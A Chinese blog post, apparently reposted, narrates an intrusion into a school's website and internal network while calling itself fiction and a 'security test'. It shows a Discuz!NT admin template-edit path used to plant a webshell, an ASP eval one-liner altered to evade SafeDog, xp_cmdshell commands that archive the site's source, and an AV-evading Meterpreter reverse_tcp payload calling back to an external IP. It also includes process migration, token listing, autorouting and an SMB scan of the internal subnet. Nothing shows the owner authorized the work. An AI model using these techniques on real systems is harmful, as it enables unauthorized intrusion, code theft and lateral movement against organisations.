对某网站的一次简单渗透测试

内容简介：对某网站的一次简单渗透测试

此文纯属虚构，纯属娱乐，内容较小白，大牛飘过。

今天心血来潮想拿学校主站的源码看看。

今天阳光明媚，帮我以前学校再做次安全测试。

曾经测试过，主站是动易CMS2006，网上没有公开的漏洞。

中间件是IIS7.5，配置不当存在一个目录浏览漏洞，也没什么卵用。

通过网站主页下方的信息得知网站是别人制作的：

然后我对XXXX网络公司进行了安全测试，得到分站：www.****.com.cn:82的超级管理员密码**wl****1917

论坛程序是 Discuz!NT 3.1.0 ，后台可以Getshell：

访问 http://www.****.com.cn:82/admin/global/global_templatesedit.aspx?path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default

即可编辑对应的rss.aspx文件，改成

Webshell 安全检测脚本。 这安全狗还是我几年前搞的时候的样子

看起来是个老版本的安全狗，管理员没更新过..

随便改改一句话木马：

<%
dim luan
luan=request("luan")
response.write("Hello " & luan)
eval luan
%>

然后就成功过狗了……..

用菜刀2010连接，发现提示403：

根据菜刀显示的HTTP头内容可知，是被

狗咬了

安全狗拦截了。

换用菜刀2016版本（下载地址： http://lu4n.com/security-tools/ ），即可正常连接：

然后尝试下执行命令：

结果提示：[Err] ActiveX 部件不能创建对象

这种情况就是组件被禁用了，只能走下别的麻烦路了。

在Discuz!NT 3.1.0后台能直接执行 SQL 语句，如果用之前的方法拿不到 shell 可以试试执行SQL语句来Getshell。

我也就懒得找数据库密码去连接了，直接到后台执行SQL语句的地方去。

通过命令打包主站的源码：

exec xp_cmdshell 'C:\progra~2\WinRAR\Rar.exe a -k -r -s -m1 D:/****web/yzblog/tools/luan.rar D:/****web/PowerEasy2006/';

之前执行命令确定了是system权限，如果执行xp_cmdshell失败，，百度”恢复xp_cmdshell”。

另外科普下 Linux 下打包网站：

tar -czf website.tar.gz /home/wwwroot

然后可以看到打包后的源码有500M，太大了，我没下载，仅做安全测试嘛，打包完就删除了。

然后就好奇学校内网里有没有可以直接SMB溢出的服务器呢，我继续上传了免杀的Meterpreter，免杀方法： http://lu4n.com/metasploit-payload-bypass-av-note/

多占点篇幅，贴一下：

> msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=103.27.187.212 -e x86/shikata_ga_nai -i 11 -f py -o C:/luan/luan.py

DL is deprecated, please use Fiddle
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai succeeded with size 630 (iteration=10)
x86/shikata_ga_nai chosen with final size 630
Payload size: 630 bytes
Saved as: C:/luan/luan.py

C:\PentestBox\bin\metasploit-framework
>

注意按照我那篇文章做下修改，怎么修改我就不贴了，太占地方了，修改后用Pyinstall打包：

C:\cnzxsoft\pyinstaller-2.0>python PyInstaller.py
--console --onefile luan.py
548 INFO: wrote C:\cnzxsoft\pyinstaller-2.0\luan\luan.spec
641 INFO: Testing for ability to set icons, version resources...
743 INFO: ... resource update available
746 INFO: UPX is not available.
2071 INFO: checking Analysis
2072 INFO: building Analysis because out00-Analysis.toc non existent
2072 INFO: running Analysis out00-Analysis.toc
2072 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable

15654 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.2
1022.8_none ...
15655 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
15668 INFO: Searching for file msvcr90.dll
15670 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
15673 INFO: Searching for file msvcp90.dll
15674 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
15675 INFO: Searching for file msvcm90.dll
15677 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
15960 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\support\_pyi_bootstrap.py
16641 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\archive.py
16733 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\carchive.py
16822 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\iu.py
16861 INFO: Analyzing luan.py
16931 INFO: Hidden import 'encodings' has been found otherwise
16933 INFO: Looking for run-time hooks
16934 INFO: Analyzing rthook C:\cnzxsoft\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
17144 INFO: Warnings written to C:\cnzxsoft\pyinstaller-2.0\luan\build\pyi.win32\luan\warnluan.txt
17150 INFO: checking PYZ
17151 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
17152 INFO: building PYZ out00-PYZ.toc
19378 INFO: checking PKG
19379 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
19381 INFO: building PKG out00-PKG.pkg
20487 INFO: checking EXE
20492 INFO: rebuilding out00-EXE.toc because luan.exe missing
20493 INFO: building EXE from out00-EXE.toc
20510 INFO: Appending archive to EXE C:\cnzxsoft\pyinstaller-2.0\luan\dist\luan.exe

C:\cnzxsoft\pyinstaller-2.0>

用MSF扫一下。

meterpreter > run post/windows/manage/migrate

[*] Running module against WIN-TOYQDX47WMW
[*] Current server process: luan.exe (5996)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4316
[+] Successfully migrated to process 4316

meterpreter > sysinfo
Computer        : WIN-TOYQDX47WMW
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter >use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
IIS APPPOOL\jwweb
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
Local subnet: 172.16.11.0/255.255.255.0
meterpreter > run post/windows/manage/autoroute

[*] Running module against WIN-TOYQDX47WMW
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.11.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #4.
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > route print

IPv4 Active Routing Table
=========================

Subnet             Netmask            Gateway
------             -------            -------
169.254.0.0        255.255.0.0        Session 2
172.16.11.0        255.255.255.0      Session 2

[*] There are currently no IPv6 routes defined.
msf exploit(handler) >  use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor           use auxiliary/scanner/smb/smb_enumshares         use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/smb/pipe_dcerpc_auditor    use auxiliary/scanner/smb/smb_enumusers          use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/psexec_loggedin_users  use auxiliary/scanner/smb/smb_enumusers_domain   use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb2                   use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_enum_gpp           use auxiliary/scanner/smb/smb_lookupsid
msf exploit(handler) >use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set rhosts 172.16.11.1-255
rhosts => 172.16.11.1-255
msf auxiliary(smb_version) > sthreads 10
threads => 10
msf auxiliary(smb_version) > run

[*] 172.16.11.11:445      - Host is running Windows 2008 Standard SP2 (build:6002) (name:WIN-TOYQDX47WMW) (workgroup:WORKGROUP )
[*] 172.16.11.12:445      - Host is running Windows 2012 R2 Standard (build:9600) (name:WIN-HKFJ6JJA9L5)
[*] Scanned  29 of 255 hosts (11% complete)
[*] Scanned  52 of 255 hosts (20% complete)
[*] Scanned  77 of 255 hosts (30% complete)
[*] Scanned 102 of 255 hosts (40% complete)
[*] Scanned 131 of 255 hosts (51% complete)
[*] Scanned 153 of 255 hosts (60% complete)
[*] Scanned 179 of 255 hosts (70% complete)
[*] Scanned 204 of 255 hosts (80% complete)
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(smb_version) >

好像就两台机器。。另一台还是win2012R2，smb溢出那个目前测试只能用在xp,7,2008。我的目标之前已经达到了，就先到此为止吧。

以上就是本文的全部内容，希望本文的内容对大家的学习或者工作能带来一定的帮助，也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

• 渗透测试之API测试技巧
• Web渗透测试笔记
• Cyberry靶机渗透测试
• 渗透测试笔试题
• IOT渗透测试一
• Moonraker靶机渗透测试

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。